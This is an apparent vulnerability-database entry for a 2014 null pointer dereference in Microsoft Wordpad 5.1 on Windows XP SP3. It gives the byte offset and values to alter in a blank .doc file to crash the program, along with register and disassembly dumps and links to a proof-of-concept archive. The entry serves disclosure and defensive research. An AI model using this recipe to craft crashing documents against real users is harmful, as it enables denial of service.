Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Microsoft Wordpad 5.1 (.doc) Null Pointer Dereference Vulnerability

🗓️ 01 Jul 2014 00:00:00Reported by RootType 
seebug
 seebug🔗 www.seebug.org👁 10 Views

Microsoft Wordpad 5.1 Null Pointer Vulnerability in .doc format on Windows XP SP

Code

                                                Microsoft Wordpad 5.1 (.doc) Null Pointer Dereference Vulnerability
Found by condis

Tested on Windows XP SP 3 Proffesional PL
MS Wordpad 5.1 (Compilation 2600.xpsp.080413-2111 SP 3)

This isn't bug from CWE 2009-0259

$ Binnary diff of template file (proper empty doc document) and malformed file 
(showing just the offset that differs):

0000 1200: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 -- template file
0000 1200: 00 00 00 00 00 00 63 6F  6E 64 00 00 00 00 00 00 -- proof of concept

Actually it doesn't matters (almost) what 4 bytes we will put there untill they != 0x00. 

Access violation when reading [00000004]

$ Registers:

eax = 020ebb72 ebx = 00000000 ecx = 020ebb7c edx = 00090608 
esi = 00000000 edi = 01bc04a8 eip = 01b9dbbb esp = 0177f5c8 
ebp = 0177f5cc 

$ Function dump :

01b9dbb4 55              push    ebp
01b9dbb5 8bec            mov     ebp,esp
01b9dbb7 56              push    esi
01b9dbb8 8b7508          mov     esi,dword ptr [ebp+8]
01b9dbbb 807e0400        cmp     byte ptr [esi+4],0         ds:0023:00000004=?? ; ---- crash
01b9dbbf 751b            jne     mswrd8+0x1dbdc (01b9dbdc)
01b9dbc1 8b06            mov     eax,dword ptr [esi]
01b9dbc3 57              push    edi
01b9dbc4 8b78fc          mov     edi,dword ptr [eax-4]
01b9dbc7 57              push    edi
01b9dbc8 ff156010b801    call    dword ptr [mswrd8+0x1060 (01b81060)]
01b9dbce 57              push    edi
01b9dbcf ff157410b801    call    dword ptr [mswrd8+0x1074 (01b81074)]
01b9dbd5 56              push    esi
01b9dbd6 e87bfdffff      call    mswrd8+0x1d956 (01b9d956)
01b9dbdb 5f              pop     edi
01b9dbdc 5e              pop     esi
01b9dbdd 5d              pop     ebp

$ 'O, hai' goes to Echo, Varseand, cxecurity and madcow ;3

$ Below You should see link to attachement with PoC:

http://cond.psychodela.pl/d/ms-wordpad-nullptr.rar
http://www.exploit-db.com/sploits/18952.rar

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
01 Jul 2014 00:00Current
7.1High risk
Vulners AI Score7.1
microsoft wordpadnull pointer dereference.docwindows xpsp 3
10